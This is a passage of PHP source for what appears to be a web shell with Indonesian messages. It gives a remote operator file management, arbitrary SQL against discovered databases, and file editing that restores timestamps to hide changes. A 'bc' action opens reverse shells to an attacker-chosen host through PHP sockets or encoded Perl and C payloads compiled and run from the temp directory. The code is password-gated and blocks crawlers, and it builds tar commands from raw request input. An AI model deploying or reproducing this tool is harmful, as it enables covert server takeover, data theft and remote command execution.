unlink($_POST['xpath'].'/'.$newname.'.zip');
}
if($zip->open($newname.'.zip', ZipArchive::CREATE)){
if(@is_dir($df)){
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($df.'/', FilesystemIterator::SKIP_DOTS));
foreach($files as $key => $value){
$zip->addFile(realpath($key), $key);
}
} else {
$zip->addFile($df);
}
$outss = $_POST['xname'].' zipped!';
} else {
$outss = 'Tidak dapat menganalisa dir/file';
}
$zip->close();
} else {
$outss = 'module ZipArchive tidak terinstall!';
}
echo $outss;
die();
} else if($_GET['act'] == 'untar'){
$df = $_POST['xpath'] .'/'. $_POST['xname'];
perintahnya("tar xf {$_POST['xname']} -C {$_POST['xpath']}", $_POST['xpath']);
try {
$phar = new PharData($_POST['xname']);
foreach ($phar as $file) {
$targetPath = $_POST['xpath'] . $file->getFilename();
if (file_exists($targetPath)) {
echo "File {$file->getFilename()} sudah ada, melewati...\n";
continue;
}
$phar->extractTo($_POST['xpath'], [$file->getFilename()], true);
echo "File {$file->getFilename()} berhasil diekstrak.\n";
}
} catch (Exception $e) {
echo "Error: " . $e->getMessage();
}
die();
} else if($_GET['act'] == 'untgz'){
$df = $_POST['xpath'] .'/'. $_POST['xname'];
perintahnya("tar xzf {$_POST['xname']} -C {$_POST['xpath']}", $_POST['xpath']);
try {
$phar = new PharData($_POST['xname']);
foreach ($phar as $file) {
$targetPath = $_POST['xpath'] . $file->getFilename();
if (file_exists($targetPath)) {
echo "File {$file->getFilename()} sudah ada, melewati...\n";
continue;
}
$phar->extractTo($_POST['xpath'], [$file->getFilename()], true);
echo "File {$file->getFilename()} berhasil diekstrak.\n";
}
} catch (Exception $e) {
echo "Error: " . $e->getMessage();
}
die();
} else if($_GET['act'] == 'unzip'){
if(class_exists('ZipArchive')){
$zip = new ZipArchive();
$df = $_POST['xpath'] .'/'. $_POST['xname'];
if($zip->open($df)) {
$zip->extractTo($_POST['xpath']);
$outss = $_POST['xname'].' extracted!';
$zip->close();
} else {
$outss = $_POST['xname'].' gagal di unzip!';
}
} else {
$outss = 'module ZipArchive tidak terinstall!';
}
echo $outss;
die();
} else if($_GET['act'] == 'mass_zip'){
if(class_exists('ZipArchive')){
$zip = new ZipArchive();
$zipfile = (isset($_POST['xname']) && !empty(trim($_POST['xname'])) ? trim($_POST['xname']) : 'zip_'.date('U')).'.zip';
if($zip->open($zipfile, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE){
$outss = "Tidak dapat membuat file ZIP: {$zipfile}";
}
$hasils = false;
$xdata = json_decode(base64_decode($_POST['xdata']),true);
foreach ($xdata as $ki => $item) {
$itemPath = $item['name'];
if($item['type'] == 'dir'){
addDirToZip($zip, $itemPath, $_POST['xpath']);
$hasils = true;
} else if ($item['type'] == 'file') {
$zip->addFile($itemPath, $item['name']);
$hasils = true;
}
}
$outss = $hasils == true ? 'ZIP file berhasil dibuat: '.$zipfile : 'Item tidak valid atau tidak ditemukan!';
$zip->close();
} else {
$outss = 'module ZipArchive tidak terinstall!';
}
echo $outss;
die();
} else if($_GET['act'] == 'mass_tar'){
$path = rtrim($_POST['xpath'], '/');
$tarfile = (isset($_POST['xname']) && !empty(trim($_POST['xname'])) ? trim($_POST['xname']) : 'tar_'.date('U')).'.tar';
$Command = "tar cf {$tarfile}";
$xdata = json_decode(base64_decode($_POST['xdata']),true);
foreach ($xdata as $ki => $item){
$itemPath = $path . '/' . $item['name'];
if (file_exists($itemPath)) {
$Command .= ' '.escapeshellarg($item['name']);
}
}
perintahnya($Command, $path);
echo file_exists($path.'/'.$tarfile) ? "File TAR berhasil dibuat: {$tarfile}" : "Item tidak valid atau tidak ditemukan";
die();
} else if($_GET['act'] == 'mass_tgz'){
$path = rtrim($_POST['xpath'], '/');
$tgzfile = (isset($_POST['xname']) && !empty(trim($_POST['xname'])) ? trim($_POST['xname']) : 'tgz_'.date('U')).'.tar.gz';
$Command = "tar czf {$tgzfile}";
$xdata = json_decode(base64_decode($_POST['xdata']),true);
foreach ($xdata as $ki => $item){
$itemPath = $path . '/' . $item['name'];
if (file_exists($itemPath)) {
$Command .= ' '.escapeshellarg($item['name']);
}
}
perintahnya($Command, $path);
echo file_exists($path.'/'.$tgzfile) ? "File TAR.GZ berhasil dibuat: {$tgzfile}" : "Item tidak valid atau tidak ditemukan";
die();
} else if($_GET['act'] == 'mass_copy'){
$path = rtrim($_POST['xpath'], '/');
$target = rtrim($_POST['xtarget'], '/');
$xdata = json_decode(base64_decode($_POST['xdata']),true);
if(!@is_dir($target)){
echo 'Tujuan ('.$target.') bukanlah sebuah direktori!';
die();
}
if(!@is_writable($target)){
echo 'Tujuan ('.$target.') is not writeable!';
die();
}
$hasils[] = '';
foreach($xdata as $ki => $item){
$sourcePath = $path.'/'.$item['name'];
$targetPath = $target.'/'.$item['name'];
if($item['type'] === 'file'){
if(file_exists($sourcePath)){
if(@copy($sourcePath, $targetPath)){
$hasils[] = 'Copy file berhasil!';
} else {
$hasils[] = 'Copy file gagal!';
}
} else {
$hasils[] = 'Copy file gagal!';
}
} else if($item['type'] === 'dir'){
if(gandakanDir($sourcePath, $targetPath)){
$hasils[] = 'Copy dir berhasil!';
} else {
$hasils[] = 'Copy dir gagal!';
}
}
}
$outs = implode(', ', array_unique($hasils));
echo $outs;
die();
} else if($_GET['act'] == 'mass_cut'){
$path = rtrim($_POST['xpath'], '/');
$target = rtrim($_POST['xtarget'], '/');
$xdata = json_decode(base64_decode($_POST['xdata']),true);
if(!@is_dir($target)){
echo 'Tujuan ('.$target.') bukanlah sebuah direktori!';
die();
}
if(!@is_writable($target)){
echo 'Tujuan ('.$target.') is not writeable!';
die();
}
$hasils[] = '';
foreach($xdata as $ki => $item){
$sourcePath = $path.'/'.$item['name'];
$targetPath = $target.'/'.$item['name'];
if($item['type'] === 'file'){
if(file_exists($sourcePath)){
$isCopyF = @copy($sourcePath, $targetPath);
if($isCopyF){
@unlink($sourcePath);
$hasils[] = "Cut file berhasil!";
} else {
$hasils[] = "Cut file gagal!";
}
}
} else if($item['type'] === 'dir'){
$isCopyD = gandakanDir($sourcePath, $targetPath);
if($isCopyD){
xrmdir($sourcePath);
$hasils[] = "Cut dir berhasil!";
} else {
$hasils[] = "Cut dir gagal!";
}
}
}
$outs = implode(', ', array_unique($hasils));
echo $outs;
die();
} else if($_GET['act'] == 'mass_del'){
$path = rtrim($_POST['xpath'], '/');
$xdata = json_decode(base64_decode($_POST['xdata']),true);
$hasils = false;
foreach ($xdata as $ki => $item){
if($item['type'] == 'dir'){
xrmdir($path.'/'.$item['name']);
$hasils = true;
} else {
unlink($path.'/'.$item['name']);
$hasils = true;
}
}
echo $hasils == true ? 'File deteled!' : 'Gagal menghapus file';
die();
} else if($_GET['act'] == 'sql'){
if($_GET['q'] == 'check'){
if(AvFunc(array('mysql_get_client_info', 'mysqli_get_client_info'))){$temp[] = "MySQL";}
if(AvFunc(array('mssql_connect'))){$temp[] = "MSSQL";}
if(AvFunc(array('pg_connect'))){$temp[] = "PostgreSQL";}
if(AvFunc(array('oci_connect'))){$temp[] = "Oracle";}
if(AvFunc(array('odbc_connect'))){$temp[] = "odbc";}
if(AvFunc(array('sqlite_open'))){$temp[] = "SQLite";}
if(class_exists('SQLite3')){$temp[] = "SQLite3";}
if(class_exists('PDO')){$temp[] = "PDO";}
if(isset($temp) && count($temp) > 0){
foreach($temp as $kt){
$dtx[] = $kt;
}
}
$outs = isset($dtx) ? array('error' => 0, 'data' => $dtx) : array('error' => 1, 'message' => 'No database installed in this server');
header("Content-type: application/json; charset=utf-8");
echo json_encode($outs);
die();
} else if($_GET['q'] == 'connect'){
if(isset($_POST)){
$sqltype = $_POST['sqltype'];
$sqlhost = $_POST['sqlhost'];
$sqluser = $_POST['sqluser'];
$sqlpass = isset($_POST['sqlpass']) && !empty($_POST['sqlpass']) ? $_POST['sqlpass'] : null;
$sqldata = isset($_POST['sqldata']) && !empty($_POST['sqldata']) ? $_POST['sqldata'] : null;
switch($sqltype){
case 'MySQL' : $contype = 'mysql'; $showdb = "SHOW DATABASES"; break;
case 'PostgreSQL': $contype = 'pgsql'; $showdb = "SELECT schema_name FROM information_schema.schemata"; break;
case 'SQLite3' :
case 'SQLite' : $contype = 'sqlite'; $showdb = "SELECT \"{$s_sql['host']}\""; break;
case 'MSSql' : $contype = 'mssql'; $showdb = "SELECT name FROM master..sysdatabases"; break;
case 'Oracle' : $contype = 'oracle'; $showdb = "SELECT USERNAME FROM SYS.ALL_USERS ORDER BY USERNAME"; break;
case 'PDO' : $contype = 'pdo'; $showdb = "SHOW DATABASES"; break;
case 'odbc' : $contype = 'odbc'; $showdb = "SHOW DATABASES"; break;
default : $contype = 'mysql'; $showdb = "SHOW DATABASES";
}
try {
$db = new DatabaseManager($contype, $sqlhost, $sqluser, $sqlpass, $sqldata);
$result = $db->query($showdb);
while ($row = $db->fetchRow($result)){
$dblists[] = "";
}
$dtTable = "
";
echo $dtTable;
} catch (Exception $e) {
echo $e->getMessage();
}
$db->close();
}
} else {
if(isset($_POST)){
$sqlconnect = json_decode(base64_decode($_POST['sqlconnect']),true);
$sqlgetdata = isset($_POST['sqlgetdata']) && !empty($_POST['sqlgetdata']) ? $_POST['sqlgetdata'] : '';
$sqlquery = isset($_POST['sqlquery']) && !empty($_POST['sqlquery']) ? $_POST['sqlquery'] : '';
$slimit = isset($_POST['slimit']) && !empty(preg_replace('/[^0-9]/','',$_POST['slimit'])) ? preg_replace('/[^0-9]/','',$_POST['slimit']) : 0;
$elimit = isset($_POST['elimit']) && !empty(preg_replace('/[^0-9]/','',$_POST['elimit'])) ? preg_replace('/[^0-9]/','',$_POST['elimit']) : 25;
switch($sqlconnect[0]){
case 'MySQL' : $contype = 'mysql'; break;
case 'PostgreSQL': $contype = 'pgsql'; break;
case 'SQLite' : case 'SQLite3' : $contype = 'sqlite'; break;
case 'MSSql' : $contype = 'mssql'; break;
case 'Oracle' : $contype = 'oracle'; break;
case 'PDO' : $contype = 'pdo'; break;
case 'odbc' : $contype = 'odbc'; break;
default : $contype = 'mysql';
}
$hasils = [];
$db = new DatabaseManager($contype, $sqlconnect[1], $sqlconnect[2], ($sqlconnect[3]!=null?$sqlconnect[3]:''), $sqlconnect[4]);
try {
if(trim($sqlquery) || trim($sqlgetdata)){
if(trim($sqlgetdata) != '' && (trim($sqlquery) == '' || trim($sqlquery) != '')){
switch($contype){
case 'mysql' : $showrows = "SELECT * FROM `{$sqlgetdata}` LIMIT {$slimit},{$elimit};"; break;
case 'pgsql' : $showrows = "SELECT * FROM {$sqlgetdata} LIMIT {$elimit} OFFSET {$slimit};"; break;
case 'sqlite' : $showrows = "SELECT * FROM {$sqlgetdata} LIMIT {$slimit},{$elimit};"; break;
case 'mssql' : $showrows = "SELECT TOP {$elimit} * FROM {$sqlgetdata};"; break;
case 'oracle' : $showrows = "SELECT * FROM {$sqlgetdata} WHERE ROWNUM BETWEEN {$slimit} AND {$elimit};"; break;
case 'pdo' :
$pdoDriver = $db->getConnection()->getAttribute(PDO::ATTR_DRIVER_NAME);
switch ($pdoDriver) {
case 'mysql' : $showrows = "SELECT * FROM `{$sqlgetdata}` LIMIT {$slimit},{$elimit};"; break;
case 'pgsql' : $showrows = "SELECT * FROM {$sqlgetdata} LIMIT {$elimit} OFFSET {$slimit};"; break;
case 'sqlite' : $showrows = "SELECT * FROM {$sqlgetdata} LIMIT {$slimit},{$elimit};"; break;
case 'sqlsrv' : $showrows = "SELECT TOP {$elimit} * FROM {$sqlgetdata};"; break;
case 'oci' : $showrows = "SELECT * FROM {$sqlgetdata} WHERE ROWNUM BETWEEN {$slimit} AND {$elimit};"; break;
default : throw new Exception("Unsupported PDO driver: {$pdoDriver}");
}
break;
case 'odbc' : $showrows = "SELECT * FROM `{$sqlgetdata}` LIMIT {$slimit},{$elimit};"; break;
default : $showrows = "SELECT * FROM `{$sqlgetdata}` LIMIT {$slimit},{$elimit};";
}
} else if(trim($sqlquery) != '' && (trim($sqlgetdata) == '' || trim($sqlgetdata) != '')){
$showrows = $sqlquery;
}
$resrows = $db->query($showrows);
if($resrows){
if(!is_bool($resrows)){
if($db->numRows($resrows) > 0){
while ($row = $db->fetchRow($resrows)){
$hasils[] = $row;
}
} else {
$fieldInfo = $db->getFieldInfo($resrows);
$hasils[] = array_fill_keys($fieldInfo['field_names'], '-');;
}
} else {
$hasils[] = ["query" => "Affected Rows: " . $db->affectedRows($showrows)];
}
}
} else {
switch($contype){
case 'mysql' : $showtbl = "SHOW TABLES FROM `{$sqlconnect[4]}`"; break;
case 'pgsql' : $showtbl = "SELECT table_name FROM information_schema.tables WHERE table_schema='{$sqlconnect[4]}'"; break;
case 'sqlite' : $showtbl = "SELECT name FROM sqlite_master WHERE type='table'"; break;
case 'mssql' : $showtbl = "SELECT name FROM {$sqlconnect[4]}.sysobjects WHERE xtype = 'U'"; break;
case 'oracle' : $showtbl = "SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='{$sqlconnect[4]}'"; break;
case 'pdo' :
$driver = $db->getConnection()->getAttribute(PDO::ATTR_DRIVER_NAME);
switch ($driver) {
case 'mysql' : $showtbl = "SHOW TABLES FROM `{$sqlconnect[4]}`"; break;
case 'pgsql' : $showtbl = "SELECT table_name FROM information_schema.tables WHERE table_schema = '{$sqlconnect[4]}'"; break;
case 'sqlite' : $showtbl = "SELECT name FROM sqlite_master WHERE type='table'"; break;
case 'sqlsrv' : $showtbl = "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES"; break;
case 'oci' : $showtbl = "SELECT TABLE_NAME FROM SYS.ALL_TABLES"; break;
default : throw new Exception("Unsupported PDO driver: {$driver}");
}
break;
case 'odbc' : $showtbl = "SHOW TABLES"; break;
default : $showtbl = "SHOW TABLES FROM `{$sqlconnect[4]}`";
}
$result = $db->query($showtbl);
if($result && $result->num_rows > 0){
while ($row = $db->fetchRow($result)){
foreach($row as $s_tables){
$hasils[$s_tables][] = $s_tables;
}
}
}
}
echo json_encode($hasils);
} catch (Exception $e) {
echo $e->getMessage();
}
$db->close();
}
}
die();
} else if($_GET['act'] == 'bc'){
$outs = '';
if(isset($_POST['xpath'], $_POST['bhost'], $_POST['bport'], $_POST['btype'])){
function which($p,$path){
$d = perintahnya('which ' . $p, $path);
if(!empty($d['stdout'])){return $d['stdout'];}
return false;
}
if($_POST['btype'] == 1){
if(AvFunc(array('fsockopen','fputs','feof','fgets','fclose'))){
$sockfd = @fsockopen($_POST['bhost'], $_POST['bport'], $errno, $errstr);
$out = "";
if($errno != 0) {
$out .= "{$errno} : {$errstr}";
} else if (!$sockfd) {
$out .= "Unexpected error has occured, connection may have failed.";
} else {
fputs($sockfd, "yoshh.. Connected!\n");
while(!feof($sockfd)) {
$cmdPrompt = '[$]~ ';
fputs($sockfd, $cmdPrompt);
$command = fgets($sockfd, $GLOBALS['chunk_size']);
fputs($sockfd, "".perintahnya($command, $_POST['xpath'])['stdout']."");
}
$out .= $sockfd;
fclose($sockfd);
}
$outs .= $out;
} else {
$outs = 'reverse shell using php: failed!';
}
} else if($_POST['btype'] == 2){
$tmpdir = str_replace('\\','/', @sys_get_temp_dir());
if(is_writable($tmpdir)){
$bcfile = $tmpdir."/bc.pl";
$cf = cf($bcfile, generate("decode", "cjNpMnEybjRyNGw0dTJqNWQ0ZTRuMnY1NjR6NWM0djFuMXE0MDZjNHAzdDNrNDc0czViNHM0ODM0M28xYzJiNGk1aTU1NHY1MzNwNWo0bDUwNjg0NDRtNG40aDRuMnQzOTNtM2IzNTV3MzU0eDNuMjkyeDQ5NmYybDVmNGE0azJyM2YzcTRyNHU1azR5MmEydDNuM3gzcjVjMngzNDM1MzIzbDJqNDM0YzQ3NHA0aTRuNGY0MzRxNTI0bDU0NG80MDRlNHY1bjJ0M2IzcjNmMzc1MTR4MjY0ejNhMmMyYjRpNWk1NTR2NWoybzN4NDg2bzNkNGM0NzRvMmQyZzN6NW00ZjRpNGQ0OTJ0MzkyMjRmNGYyeTM2MzYzczFoMms0ejVsNHM0bzRnNDk0NTRtNHg1dzVnNHg1aDRpNXU0dTVoNW00ODRpMm4ybjRhNHg1ajJoMnoyNDNuMTA2ZjQ5NGM0YTQxNm4yNDVwM2MzajNxNHUzczJoMno0YzN6M2YzejRuNHAzeDNhMjM1bzNuNHY0ODRxM3EzdTNjM2MzeTRvMjgyYzJ2NWo0dzVrNGw0aTJkMjk2ejRwM2E0ZTQ5NHgzZzJoM3I0eDVoNGk0MDNwM3EzYTI5NWc0cTNtMmY0NTN2MTY0aDRtNGg0YzRrNW80ZzJuM3k0ODN3NDkzdTNsMmQydDNuNGk1YTQ5NG00eTNlMjA1MTVuMzY0OTQ3NHgzbzNhM3Y1azR2NW40ZTRvM2wyYzJ5M200ZDJvMmc0dDFtMWY0djU2NHY1ZzJ0M3AzZDN1NHAzMTRlMmYyNjN2M3QzcjNnM3U0YjNvM2MyeTNkNHExejJoNHc1YTR1NXczdzNyM2EzcjNzM3YzMTRjMmEyMjN0M28zMDU3M2wzYTN0M3IzbzJnNHYxcjFqNHg1YjRtNHAyMjVxMzgzYjMzNTA1bDJsM2MyaTRqMjM1ejRnM2kzYjN3M2QybzJnNHQxbTFqNDQ2azQxNjU0ajRoMmsyNDQ5NHE1azRzMm40cDVlMnQyaTR1M2oyejJyMTMzaDVkNHM1bDRsNWwyMzU0NWgzZzNrM3AyMjN3MTMzNzRjNGY0eTU2NHgzbjN1MzkzbzM2NXYzeTM1M3UxcTFrNWk0bjRzNGs1aTJuM3EzcDRuNG4zejRqMmY0"));
if($cf){
if(which('perl')){
$out = perintahnya("perl {$bcfile} {$_POST['bhost']} {$_POST['bport']} &", $tmpdir);
$outs = $out['stdout']."\n".perintahnya("".generate("decode", "w5s4b234t4r4f296c274i4k5h4p32494n2l4t5")."", $tmpdir)['stdout'];
} else {
$outs = 'reverse shell using perl: failed!';
}
} else {
$outs = 'reverse shell using perl: failed!';
}
} else {
$outs = 'temp directory is not writeable!';
}
} else if($_POST['btype'] == 3){
$tmpdir = str_replace('\\','/', @sys_get_temp_dir());
if(is_writable($tmpdir)){
$bcfile = $tmpdir."/bc.c";
$cf = cf($bcfile, generate("decode", "cjNpNGg0NTRrNG80YjRtNWMyMDNqNHo1NTRxNWY0czI5NDczNjN0MXMzZjRqNDc0dDVyNGM0ZTRuMzIzajRyNDA2MTRrNHM1NTRyNWE0MDYyNGg0NTNyMXUxZTJnNHY1NzRjNGw0ajU2NHAzMDNrNDY0cDRxNWw0bTVxNHMyZDR2NXMyZzRiMzQzbzE5NGc0MTZtM2U0ZTViNHU1bDJwNXU1dDRiMjM0cTRhNGE0MTRjMjM0ODRnNWo0cDNpMjc0ajRjNDM2MjRlNW4yZDJ2NDYzczFnMmgybjNhMjk0ZzQxNm0zNzRoNTEzNTNyMW8zbzNoMmIybDRzNGw0czRrNW80ODJqNHU1NDRzNTE0YTQ1NG40ZzVnNHY1ZTJvNGQ0djU1M3gxdjFuM2EyODJhMmw1ZjU2NHE1aDR1NWwyNTQwNHgyazIxM3gxcDFmMnAzYzI4Mmo0bzVmNDM0ajRmNGY0NDRuNTg0dTVmNGg0dDRwMzczZzJlM3A0MTRkM2szcTQyNTAzMjNvMW8zZDJvM28zczRjNGc0dTJtNGc0djUzNGc0ZjR4NWw0cDMxM2UyOTRwNHc1bDQwNm0yNjRvNHc1ZjRvMmE0eDU5NG00eDM3NGI1aTJ1MzEzNTNyMW8zbzNoMmIybDRoNGg0dDIwNmQ0ZTR6M2c1NTRsNWk0czJrNDQ0aTViNGw1bzRkMjUzcDNmNG00ZTR6NTE0MTQ2NGw1dzVoMmU1azRuNXI0YjU1NDY0azIxM3gxcDFmMnAzYzI4MjY0ajU5Mmk0ODJwNGc0ODRzNWM0MTZtMmEzZTNnNWozcTNpMzM1bTI4MnAzMDVsNGczYzVwMzQ1cjNwNGw0cTNuMmEybDNuM3IzMzVuM28zajNlNXAzbzRrM24yOTI0MzYzdDFwM2UyZDJjMnE1YzRnMnAydjM1NGY0ZzR2NWo1NDR4NWkybTU5NDA0bzNwMm00bTRxNG80YTQxNmMyajRmNGk1YzRpNTQ0YTRqNGQyejNvMnAzazJvNGQ0djVxMmcyczRvNXM0NTRoNG41dTNrNHg1azQxNjg0MDZvM3M0aTQ1NGo0NDRiNGw1bTRoMmgydzMxMzU0aDJlMnM0dTEzM2YycDNlMmQyYzJwM2UyZzJwNGs1azRpNGg0ejV1M2IyazRoNHU1ajRsNWo1dDRiMjg0OTRjNGo0cjNsMnoycDExMzkycDM4MmUyOTJkMnAzZjJ6NWI0cDRwNHo1azRnMngyZTRyMW0xYTJwM20zOTI2NnIxMjNkMm8zbzNoMjc0bjRvNHQybjJuNTg0azI4MjM0aTJnNHAxczE5MmQycDNmMmw1cjRsNHUyeDNjNGM0dDJuM3IyaDIxMzYzMDM5MmwzYTJvMzk0MTZ3NXoyajI4NGM0bjJmMjc0bDJ6MnAxMTM5MnAzODJlMms0dTQwNnI0bTVqNGwyZTI0NDg0aDRuNDI0bDQ4NGEyMjRuNWIydTMxMzUzcjFvM28zaDJiMjU0azRpNHE0bTVrMjY0NDR3MzAzNjNtMXo0"));
if($cf){
if(which('gcc')){
$out = perintahnya("".generate("decode", "n5c464a2t2i4f244o4d4g42434k582t2l4i4x5u2j594r274")."", $tmpdir);
@unlink($bcfile);
$out = perintahnya("{$bcfile} {$_POST['bhost']} {$_POST['bport']} &", $tmpdir);
$outs = perintahnya("".generate("decode", "w5s4b234t4r4f296c274i4k5h4p32494")."", $tmpdir)['stdout'];
} else {
$outs = 'reverse shell using C: failed!';
}
} else {
$outs = 'reverse shell using C: failed!';
}
} else {
$outs = 'temp directory is not writeable!';
}
} else {
$outs = 'method gak tersedia!';
}
} else {
$outs = 'gak bisa di konekin!';
}
echo $outs;
die();
} else if($_GET['act'] == 'path'){
$_SESSION['path'] = isset($_GET['dir']) && !empty($_GET['dir']) ? $_GET['dir'] : $_SESSION['path'];
if(isset($_GET['opt'], $_GET['entry'])){
$df = $_SESSION['path'] .'/'. $_GET['entry'];
if($_GET['opt'] == 'newfile'){
$xdata = isset($_POST['xdata']) ? base64_decode($_POST['xdata']) : '';
if(AvFunc(array('fopen','fwrite','fclose'))){
$fp = @fopen($df, 'w');
if($fp){
@fwrite($fp, $xdata);
@fclose($fp);
$dout = "{$_GET['entry']} berhasil dibuat!";
} else {
$dout = "{$_GET['entry']} gagal dibuat!";
}
} else if(AvFunc(array('file_put_contents'))){
file_put_contents($df, $xdata);
$outs = file_exists($df) ? "{$_GET['entry']} berhasil dibuat!" : "{$_GET['entry']} gagal dibuat!";
} else {
$outs = "{$_GET['entry']} gagal dibuat!";
}
} else if($_GET['opt'] == 'edit'){
if(isset($_POST['xdata'])){
$_POST['xdata'] = base64_decode($_POST['xdata']);
$time = @filemtime($df);
if(AvFunc(array('fopen','fwrite','fclose'))){
$fp = @fopen($df, 'w');
if($fp){
@fwrite($fp, $_POST['xdata']);
@fclose($fp);
@touch($df, $time, $time);
$dout = "{$_GET['entry']} berhasil di-edit!";
} else {
$dout = "{$_GET['entry']} gagal di-edit!";
}
} else if(AvFunc(array('file_put_contents'))){
file_put_contents($df, $_POST['xdata']);
@touch($df, $time, $time);
$dout = file_exists($df) ? "{$_GET['entry']} berhasil di-edit!" : "{$_GET['entry']} gagal di-edit!";
} else {
$dout = "{$_GET['entry']} tidak dapat di-edit!";
}
} else {
if(!is_writable($df)){
$dout = "Disini gk bisa edit file/direktori!";
} else {
if(AvFunc(array('fopen','fread','fclose'))){
$filesize = @filesize($df);
$fp = @fopen($df, 'r');
if($fp){
$dout = "";
while(!@feof($fp)){$dout .= htmlspecialchars(@fread($fp, $filesize>0?$filesize:8192));}
@fclose($fp);
}
} else{
$dout = "Gagal edit {$_GET['entry']}!";
}
}
}
} else if($_GET['opt'] == 'download'){
if(isset($_GET['dir'], $_GET['entry'])){
$df = $_GET['dir'] .'/'. $_GET['entry'];
if(@is_file($df) && @is_readable($df)){
header('Pragma: public');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Content-Type: application/force-download');
header('Content-Type: application/download');
header('Content-Type: '.(function_exists('mime_content_type') ? @mime_content_type($df) : 'application/octet-stream'));
header('Content-Description: File Transfer');
header('Content-Disposition: attachment; filename='.basename($df));
header('Content-Length: '.@filesize($df));
header('Content-Transfer-Encoding: binary');
$fp = @fopen($df, 'r');
if($fp){
while(!@feof($fp)) echo @fread($fp, @filesize($df));
fclose($fp);
}
exit();
} else {
echo "File tidak dapat di download!'"; exit();
}
} else {
echo "Tidak ada file yang dipilih!"; exit();
}
} else {
$dout = '';
if(@filesize($df)>0){
if(AvFunc(array('fopen','fread','fclose'))){
$fp = @fopen($df, 'r');
if($fp){
while(!@feof($fp)){$dout .= htmlspecialchars(@fread($fp, @filesize($df)));}
@fclose($fp);
}
} else if(AvFunc(array('file_get_contents'))){
$dout .= @file_get_contents($df);
} else {
$dout .= "{$_GET['entry']} ini gak bisa dibaca!";
}
} else {
if(AvFunc(array('file_get_contents'))){
$dout .= @file_get_contents($df);
}
}
}
echo $dout;
} else {
echo base64_encode(FManager($_SESSION['path']));
}
die();
} else if($_GET['act'] == 'logout'){
unset($_SESSION['auth'], $_SESSION['path']);
header('location: '.$_SERVER['PHP_SELF']);
exit();
}
}
blockCrawler();
if(isset($_POST['xpass'])){
if(password_verify($_POST['xpass'], $auth_pass)){
$_SESSION['auth'] = $auth_pass;
$_SESSION['path'] = $lokasiberkas;
header('location: '.$_SERVER['PHP_SELF']);
exit();
} else {
$statusLogin[] = 'wrong password :(';
}
}
if(!isset($_SESSION['auth'])){
echo "
Restricted area
";
die();
} else {
?>
<?php echo $stitle;?>